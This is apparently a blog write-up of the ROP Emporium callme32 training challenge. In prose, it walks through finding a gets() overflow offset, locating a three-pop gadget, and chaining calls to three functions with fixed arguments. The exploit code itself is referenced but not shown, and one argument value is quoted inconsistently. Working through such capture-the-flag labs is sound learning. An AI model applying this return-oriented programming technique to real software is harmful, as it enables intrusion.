ROP Emporium Callme32 (32 Bit) Writeup

This is the 3rd challenge in ROP Emporium and it does get a bit tricky from here. I had to call 3 functions and each function has 3 arguments “0xdeadbeef”, “0xcafebabe”, “0xd00df00d”. So let's get started with the challenge.

First I start the challenge by checking the type of file the given binary is.

Next, I check the memory protection in the binary by using “checksec”

Now I had to check the functions present in the binary. I used rabin2 to get the details.

rabin2 -i “binary_name”

I noticed last time that rabin2 and gdb don’t give all the functions in the binary. So I used this tool called objdump. This gave every function present in the binary. Once again usefulFunction() wasn't displayed in rabin2 and gdb :(

As per the hint given on the website, the functions to be called are “callme1()”, “callme2()”, “callme3()”.On further analyzing the binary, I found that the main function calls pwnme(). pwnme() has a gets() which I use to exploit this challenge.

I had to find the offset value to overwrite the buffer, padding, and ebp. To do this, I used “pattern create” in gdb-peda. Then I used this pattern as input after running the binary inside gdb-peda.

Here, We can see that “AFAA” has been overwritten into EIP. To check the offset value, we use “pattern offset”.

So I need to give 44 Random characters to overwrite the buffer, padding, and EBP. Now I had to find the address of “callme1()”, “callme2()”, “callme3()” functions. I directly used the one we got in rabin2 back in picture 3.

This is where things take a turn. How do we send 3 arguments in EIP? A quick search on google gave me the answer. We use registers to pop the value.

But how do we insert the value in it? And that's where ROPgadgets comes in handy. We need to find gadgets having 3 pops and a return.

So the last one can be used for our purpose. Now I tried developing the logic. First I need to overwrite the buffer, padding, and ebp to reach eip. Then I call the callme1() function. After that, I call the gadget with 3 pops and finally the 3 arguments “0xdeadbeef”, “0xcafebabe”, “0xc00df00d”. This will be taken as an argument to the first functions. I repeat this for the other 2 functions as well. So here is my exploit. Refer to my previous blogs on how to draw the stack diagram for this.

Executing this should give my flag.

WE HAVE OUR FLAG!

Hope you understood the challenge. Do check out my other blogs.

Don’t forget to give some claps if you reached here :) Follow me for more writeups.

Goodbye:)